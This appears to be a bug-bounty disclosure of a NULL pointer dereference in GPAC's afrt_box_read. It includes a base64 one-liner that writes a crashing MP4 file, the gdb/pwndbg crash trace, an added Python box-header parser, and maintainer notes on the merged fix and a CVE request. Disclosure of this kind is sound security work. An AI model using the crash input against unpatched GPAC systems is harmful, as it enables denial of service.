NULL Pointer Dereference in gpac/gpac

Valid

Reported on

Feb 1st 2022


Description

Null Pointer Dereference in afrt_box_read

Proof of Concept

echo AAAAEW1ldGFzXSAAAABkaXIAAAAAYWZydHRzdnB5dG/oAwBtAGwAAm0= | base64 -d > poc
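As an added illustration (not part of the original report and not GPAC's own parser), the following Python decodes the PoC above and walks its ISOBMFF box headers, so the reader can see what the crashing input contains before it reaches afrt_box_read; the anomaly labels are my own.

```python
import base64
import struct

# PoC bytes from this report, decoded from the base64 one-liner above (41 bytes).
POC = base64.b64decode("AAAAEW1ldGFzXSAAAABkaXIAAAAAYWZydHRzdnB5dG/oAwBtAGwAAm0=")


def walk_boxes(data):
    """Walk the top-level ISOBMFF boxes in data.

    Returns one dict per box (offset, type, effective size, payload length)
    plus the header-level anomalies a strict reader should reject before
    handing the payload to a type-specific parser such as afrt_box_read.
    """
    end, offset, boxes = len(data), 0, []
    while offset + 8 <= end:
        size = struct.unpack(">I", data[offset:offset + 4])[0]
        btype = data[offset + 4:offset + 8].decode("latin-1")
        header_len, anomalies = 8, []
        if size == 1:  # largesize: 64-bit length follows the type field
            if offset + 16 > end:
                anomalies.append("truncated largesize field")
                size = end - offset
            else:
                size = struct.unpack(">Q", data[offset + 8:offset + 16])[0]
                header_len = 16
        elif size == 0:  # box extends to end of file; its length is whatever is left
            anomalies.append("size 0: box extends to end of file")
            size = end - offset
        if size < header_len:
            anomalies.append("declared size smaller than box header")
        if offset + size > end:
            anomalies.append("declared size exceeds file length")
        avail = min(size, end - offset)
        boxes.append({"offset": offset, "type": btype, "size": size,
                      "payload_len": max(0, avail - header_len),
                      "anomalies": anomalies})
        if size < header_len or offset + size > end:
            break  # cannot advance safely past a malformed header
        offset += size
    return boxes


if __name__ == "__main__":
    # For the PoC this reports a 17-byte "meta" box (a FullBox: 4 bytes of
    # version/flags leave 5 bytes, consistent with GPAC's "has 5 extra bytes"
    # warning) followed by a size-0 "afrt" box carrying only 16 payload bytes.
    for box in walk_boxes(POC):
        print(box)
```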

gdb output

pwndbg> r -bt poc
Starting program: /run/shm/gpac/bin/gcc/MP4Box -bt poc
ERROR: Could not find ELF base!
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[iso file] Box "meta" (start 0) has 5 extra bytes

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff79aedfe in afrt_box_read () from /run/shm/gpac/bin/gcc/libgpac.so.10
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────
 RAX  0xffffffff
 RBX  0x5555555ca500 —▸ 0x5555555c92e0 ◂— 0xfbad2498
 RCX  0x5555555ca8b0 ◂— 0x0
 RDX  0x491
 RDI  0x0
 RSI  0x5555555ca890 ◂— 0x0
 R8   0x5555555ca8a0 —▸ 0x7ffff770bbe0 (main_arena+96) —▸ 0x5555555d2910 ◂— 0x33 /* '3' */
 R9   0x5555555cad40 ◂— 0x490
 R10  0x5555555c9010 ◂— 0x3000200050000
 R11  0x7ffff770bbe0 (main_arena+96) —▸ 0x5555555d2910 ◂— 0x33 /* '3' */
 R12  0x7
 R13  0xffffffff
 R14  0x5555555caf60 ◂— 0x61667274 /* 'trfa' */
 R15  0x8
 RBP  0x5555555ca8a0 —▸ 0x7ffff770bbe0 (main_arena+96) —▸ 0x5555555d2910 ◂— 0x33 /* '3' */
 RSP  0x7fffffff7dd0 ◂— 0x5
 RIP  0x7ffff79aedfe (afrt_box_read+142) ◂— mov    byte ptr [rbp + rax], 0
─────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────
 ► 0x7ffff79aedfe <afrt_box_read+142>    mov    byte ptr [rbp + rax], 0
   0x7ffff79aee03 <afrt_box_read+147>    test   r13d, r13d
   0x7ffff79aee06 <afrt_box_read+150>    je     afrt_box_read+343 <afrt_box_read+343>
    ↓
   0x7ffff79aeec7 <afrt_box_read+343>    mov    rax, qword ptr [r14 + 8]
   0x7ffff79aeecb <afrt_box_read+347>    jmp    afrt_box_read+224 <afrt_box_read+224>
    ↓
   0x7ffff79aee50 <afrt_box_read+224>    mov    r15d, dword ptr [rsp + 0xc]
   0x7ffff79aee55 <afrt_box_read+229>    mov    rdi, qword ptr [r14 + 0x30]
   0x7ffff79aee59 <afrt_box_read+233>    mov    qword ptr [r14 + 8], rax
   0x7ffff79aee5d <afrt_box_read+237>    mov    rsi, rbp
   0x7ffff79aee60 <afrt_box_read+240>    mov    edx, r15d
   0x7ffff79aee63 <afrt_box_read+243>    call   gf_list_insert@plt <gf_list_insert@plt>
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffff7dd0 ◂— 0x5
01:0008│     0x7fffffff7dd8 ◂— 0x555ca7d0
02:0010│     0x7fffffff7de0 ◂— 0x8
03:0018│     0x7fffffff7de8 —▸ 0x7fffffff7f60 ◂— 0x0
04:0020│     0x7fffffff7df0 —▸ 0x5555555ca500 —▸ 0x5555555c92e0 ◂— 0xfbad2498
05:0028│     0x7fffffff7df8 ◂— 0x18
06:0030│     0x7fffffff7e00 ◂— 0x61667274 /* 'trfa' */
07:0038│     0x7fffffff7e08 —▸ 0x5555555caf60 ◂— 0x61667274 /* 'trfa' */
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► f 0   0x7ffff79aedfe afrt_box_read+142
   f 1   0x7ffff79562a9 gf_isom_box_parse_ex+1145
   f 2   0x7ffff7956a50 gf_isom_parse_root_box+64
   f 3   0x7ffff795f16c gf_isom_parse_movie_boxes_internal+236
   f 4   0x7ffff79608f7 gf_isom_open_file+311
   f 5   0x55555557f614 mp4boxMain+19444
   f 6   0x7ffff75470b3 __libc_start_main+243
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x00007ffff79aedfe in afrt_box_read () from /run/shm/gpac/bin/gcc/libgpac.so.10
#1  0x00007ffff79562a9 in gf_isom_box_parse_ex () from /run/shm/gpac/bin/gcc/libgpac.so.10
#2  0x00007ffff7956a50 in gf_isom_parse_root_box () from /run/shm/gpac/bin/gcc/libgpac.so.10
#3  0x00007ffff795f16c in gf_isom_parse_movie_boxes_internal () from /run/shm/gpac/bin/gcc/libgpac.so.10
#4  0x00007ffff79608f7 in gf_isom_open_file () from /run/shm/gpac/bin/gcc/libgpac.so.10
#5  0x000055555557f614 in mp4boxMain ()
#6  0x00007ffff75470b3 in __libc_start_main (main=0x55555556d500 <main>, argc=3, argv=0x7fffffffdda8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>,
 stack_end=0x7fffffffdd98) at ../csu/libc-start.c:308
#7  0x000055555556d53e in _start ()

Impact

This vulnerability is capable of crashing software, so I think this can be described as DoS.

References

gpac/gpac maintainer (Maintainer, 4 months ago): https://github.com/gpac/gpac/issues/2093

gpac/gpac maintainer validated this vulnerability 4 months ago
gpac/gpac maintainer confirmed that a fix has been merged on 34a23c 4 months ago
Jamie Slome (Admin, 4 months ago):

@maintainer - the researcher has requested a CVE for this report. Are you happy for us to go ahead and assign a CVE to this report?
